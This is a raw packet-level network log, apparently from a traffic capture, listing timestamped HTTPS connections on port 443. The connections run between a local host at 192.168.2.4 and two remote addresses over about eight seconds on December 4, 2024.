Dec 4, 2024 12:17:49.189834118 CET	443	49880	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:49.190310955 CET	49880	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:49.190315962 CET	443	49880	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:49.332412004 CET	443	49883	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:49.333626032 CET	49883	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:49.334148884 CET	49883	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:49.334153891 CET	443	49883	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:49.336287975 CET	49883	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:49.336293936 CET	443	49883	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:49.519857883 CET	443	49882	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:49.520443916 CET	49882	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:49.520481110 CET	443	49882	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:49.520945072 CET	49882	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:49.520950079 CET	443	49882	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:49.541290045 CET	443	49879	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:49.542346954 CET	443	49878	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:49.544946909 CET	443	49879	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:49.545002937 CET	443	49879	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:49.545092106 CET	49879	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:49.545150995 CET	49879	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:49.545150995 CET	49879	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:49.545166016 CET	443	49879	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:49.545176983 CET	443	49879	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:49.545336008 CET	443	49878	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:49.548214912 CET	49884	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:49.548258066 CET	443	49884	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:49.548274994 CET	49878	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:49.548306942 CET	49884	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:49.548310995 CET	49878	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:49.548310995 CET	49878	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:49.548321962 CET	443	49878	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:49.548330069 CET	443	49878	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:49.548547029 CET	49884	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:49.548557997 CET	443	49884	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:49.550549984 CET	49885	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:49.550580025 CET	443	49885	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:49.550668001 CET	49885	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:49.550785065 CET	49885	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:49.550795078 CET	443	49885	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:49.618429899 CET	443	49881	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:49.622447968 CET	443	49880	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:49.622499943 CET	443	49881	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:49.622528076 CET	443	49880	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:49.622543097 CET	443	49881	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:49.622570992 CET	49881	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:49.622628927 CET	49880	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:49.622786999 CET	49881	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:49.622787952 CET	49880	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:49.622798920 CET	443	49880	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:49.622812986 CET	49880	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:49.622817993 CET	443	49880	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:49.623842001 CET	49881	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:49.623866081 CET	443	49881	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:49.623881102 CET	49881	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:49.623886108 CET	443	49881	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:49.626898050 CET	49886	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:49.626909018 CET	443	49886	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:49.626986980 CET	49886	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:49.627123117 CET	49887	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:49.627132893 CET	49886	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:49.627141953 CET	443	49886	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:49.627149105 CET	443	49887	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:49.627211094 CET	49887	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:49.627278090 CET	49887	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:49.627288103 CET	443	49887	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:49.964601040 CET	443	49882	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:49.967685938 CET	443	49882	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:49.967772961 CET	49882	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:49.967822075 CET	49882	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:49.967833042 CET	443	49882	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:49.967848063 CET	49882	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:49.967853069 CET	443	49882	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:49.971024990 CET	49888	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:49.971055031 CET	443	49888	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:49.971134901 CET	49888	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:49.971366882 CET	49888	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:49.971383095 CET	443	49888	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:50.230825901 CET	443	49883	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:50.230849028 CET	443	49883	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:50.230896950 CET	49883	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:50.230906963 CET	443	49883	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:50.230923891 CET	49883	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:50.230932951 CET	443	49883	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:50.230959892 CET	49883	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:50.230990887 CET	49883	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:50.231535912 CET	49883	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:50.231544971 CET	443	49883	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:51.270842075 CET	443	49884	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:51.271748066 CET	49884	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:51.271786928 CET	443	49884	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:51.272286892 CET	49884	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:51.272294044 CET	443	49884	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:51.280601978 CET	443	49885	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:51.281047106 CET	49885	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:51.281069994 CET	443	49885	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:51.281513929 CET	49885	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:51.281519890 CET	443	49885	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:51.512244940 CET	443	49886	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:51.512450933 CET	443	49887	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:51.513196945 CET	49886	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:51.513216019 CET	443	49886	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:51.518979073 CET	49886	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:51.518986940 CET	443	49886	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:51.519783020 CET	49887	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:51.519813061 CET	443	49887	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:51.520334959 CET	49887	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:51.520340919 CET	443	49887	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:51.684432983 CET	443	49888	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:51.687370062 CET	49888	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:51.687388897 CET	443	49888	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:51.687863111 CET	49888	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:51.687866926 CET	443	49888	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:51.825211048 CET	443	49884	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:51.825325966 CET	443	49884	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:51.825423002 CET	49884	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:51.825735092 CET	49884	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:51.825754881 CET	443	49884	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:51.825764894 CET	49884	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:51.825769901 CET	443	49884	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:51.829437017 CET	443	49885	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:51.830141068 CET	49889	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:51.830182076 CET	443	49889	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:51.830842972 CET	49889	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:51.831118107 CET	49889	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:51.831130028 CET	443	49889	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:51.832379103 CET	443	49885	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:51.832463980 CET	49885	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:51.832523108 CET	49885	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:51.832540989 CET	443	49885	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:51.832551956 CET	49885	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:51.832556963 CET	443	49885	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:51.836410046 CET	49890	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:51.836443901 CET	443	49890	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:51.836503983 CET	49890	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:51.836700916 CET	49890	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:51.836711884 CET	443	49890	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:51.946577072 CET	443	49886	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:51.946907997 CET	443	49887	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:51.950225115 CET	443	49886	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:51.950304985 CET	49886	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:51.950614929 CET	49886	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:51.950624943 CET	443	49886	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:51.951823950 CET	443	49887	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:51.951909065 CET	443	49887	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:51.951966047 CET	49887	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:51.952842951 CET	49887	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:51.952860117 CET	443	49887	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:51.952871084 CET	49887	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:51.952881098 CET	443	49887	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:51.957319975 CET	49891	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:51.957355022 CET	443	49891	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:51.957412958 CET	49891	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:51.957581997 CET	49892	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:51.957621098 CET	443	49892	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:51.957670927 CET	49892	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:51.957907915 CET	49891	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:51.957921982 CET	443	49891	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:51.957999945 CET	49892	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:51.958012104 CET	443	49892	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:52.119230986 CET	443	49888	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:52.119293928 CET	443	49888	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:52.119389057 CET	49888	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:52.119755983 CET	49888	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:52.119765997 CET	443	49888	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:52.119777918 CET	49888	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:52.119782925 CET	443	49888	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:52.122972965 CET	49893	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:52.122999907 CET	443	49893	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:52.123095036 CET	49893	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:52.123259068 CET	49893	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:52.123270988 CET	443	49893	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:52.789560080 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:52.789642096 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:52.789648056 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:52.789695978 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:52.790728092 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:52.790739059 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:53.550611973 CET	443	49889	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:53.554889917 CET	49889	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:53.554904938 CET	443	49889	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:53.559417009 CET	49889	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:53.559422970 CET	443	49889	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:53.634429932 CET	443	49890	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:53.676662922 CET	443	49891	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:53.680408001 CET	443	49892	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:53.681301117 CET	49890	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:53.728223085 CET	49891	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:53.733823061 CET	49892	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:53.745470047 CET	49890	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:53.745480061 CET	443	49890	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:53.745982885 CET	49890	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:53.745986938 CET	443	49890	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:53.758764982 CET	49891	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:53.758776903 CET	443	49891	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:53.759215117 CET	49891	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:53.759219885 CET	443	49891	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:53.768963099 CET	49892	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:53.768970013 CET	443	49892	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:53.770694971 CET	49892	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:53.770700932 CET	443	49892	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:53.902451038 CET	443	49893	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:53.946932077 CET	49893	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:53.984879017 CET	443	49889	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:53.988210917 CET	443	49889	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:53.988306046 CET	49889	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:54.035104990 CET	49893	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:54.035120010 CET	443	49893	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:54.035612106 CET	49893	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:54.035619020 CET	443	49893	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:54.037394047 CET	49889	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:54.037411928 CET	443	49889	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:54.037431002 CET	49889	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:54.037436962 CET	443	49889	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:54.058098078 CET	49894	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:54.058121920 CET	443	49894	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:54.058193922 CET	49894	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:54.065084934 CET	49894	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:54.065098047 CET	443	49894	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:54.111851931 CET	443	49891	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:54.111917973 CET	443	49891	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:54.111955881 CET	49891	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:54.115885973 CET	443	49892	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:54.116231918 CET	49891	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:54.116255999 CET	443	49891	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:54.116255999 CET	49891	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:54.116264105 CET	443	49891	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:54.119138002 CET	443	49892	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:54.119184971 CET	49892	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:54.121340036 CET	49892	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:54.121346951 CET	443	49892	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:54.121357918 CET	49892	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:54.121362925 CET	443	49892	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:54.130706072 CET	49895	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:54.130737066 CET	443	49895	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:54.130789042 CET	49895	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:54.132616997 CET	49896	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:54.132647991 CET	443	49896	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:54.132704020 CET	49896	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:54.133074045 CET	49895	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:54.133088112 CET	443	49895	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:54.133404016 CET	49896	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:54.133419037 CET	443	49896	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:54.359555006 CET	443	49893	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:54.363471985 CET	443	49893	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:54.363523960 CET	49893	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:54.365036011 CET	49893	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:54.365060091 CET	443	49893	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:54.371340990 CET	49897	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:54.371371031 CET	443	49897	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:54.371423006 CET	49897	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:54.373960018 CET	49897	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:54.373975039 CET	443	49897	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:55.568090916 CET	443	49890	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:55.571219921 CET	443	49890	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:55.571290970 CET	443	49890	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:55.571306944 CET	49890	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:55.571367025 CET	49890	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:55.571429014 CET	49890	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:55.571448088 CET	443	49890	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:55.571458101 CET	49890	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:55.571464062 CET	443	49890	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:55.913139105 CET	443	49895	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:55.913192034 CET	443	49896	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:55.913866997 CET	49895	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:55.913882971 CET	443	49895	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:55.913911104 CET	49896	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:55.913937092 CET	443	49896	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:55.914412975 CET	49895	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:55.914417028 CET	443	49895	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:55.914702892 CET	49896	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:55.914710999 CET	443	49896	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:55.938113928 CET	49898	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:55.938168049 CET	443	49898	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:55.938241959 CET	49898	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:55.938463926 CET	49898	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:55.938477039 CET	443	49898	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:56.089289904 CET	443	49894	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:56.091986895 CET	49894	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:56.092014074 CET	443	49894	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:56.092488050 CET	49894	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:56.092494011 CET	443	49894	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:56.153614998 CET	443	49897	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:56.165920973 CET	49897	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:56.165956020 CET	443	49897	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:56.167191029 CET	49897	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:56.167197943 CET	443	49897	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:56.356724977 CET	443	49896	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:56.359642029 CET	443	49895	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:56.360054016 CET	443	49896	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:56.360127926 CET	49896	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:56.362657070 CET	443	49895	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:56.362721920 CET	49895	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:56.396631956 CET	49896	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:56.396655083 CET	443	49896	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:56.396667004 CET	49896	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:56.396672964 CET	443	49896	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:56.399813890 CET	49895	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:56.399847031 CET	443	49895	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:56.399859905 CET	49895	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:56.399867058 CET	443	49895	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:56.524602890 CET	443	49894	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:56.527602911 CET	443	49894	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:56.527652025 CET	443	49894	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:56.527676105 CET	49894	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:56.527720928 CET	49894	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:56.596352100 CET	443	49897	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:56.600181103 CET	443	49897	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:56.600267887 CET	49897	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:56.602037907 CET	49894	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:56.602037907 CET	49894	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:56.602071047 CET	443	49894	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:56.602083921 CET	443	49894	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:56.639410019 CET	49897	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:56.639431000 CET	443	49897	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:56.639441967 CET	49897	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:56.639447927 CET	443	49897	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:56.658879995 CET	49899	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:56.658905029 CET	443	49899	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:56.658963919 CET	49899	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:56.659953117 CET	49900	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:56.659972906 CET	443	49900	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:56.660024881 CET	49900	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:56.661694050 CET	49901	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:56.661722898 CET	443	49901	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:56.661783934 CET	49901	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:56.662014008 CET	49899	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:56.662026882 CET	443	49899	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:56.662147999 CET	49900	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:56.662162066 CET	443	49900	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:56.662538052 CET	49901	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:56.662553072 CET	443	49901	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:56.664376020 CET	49902	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:56.664393902 CET	443	49902	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:56.664459944 CET	49902	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:56.664608002 CET	49902	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:56.664619923 CET	443	49902	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:57.659919977 CET	443	49898	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:57.660542965 CET	49898	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:57.660564899 CET	443	49898	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:57.661283970 CET	49898	443	192.168.2.4	13.107.246.63
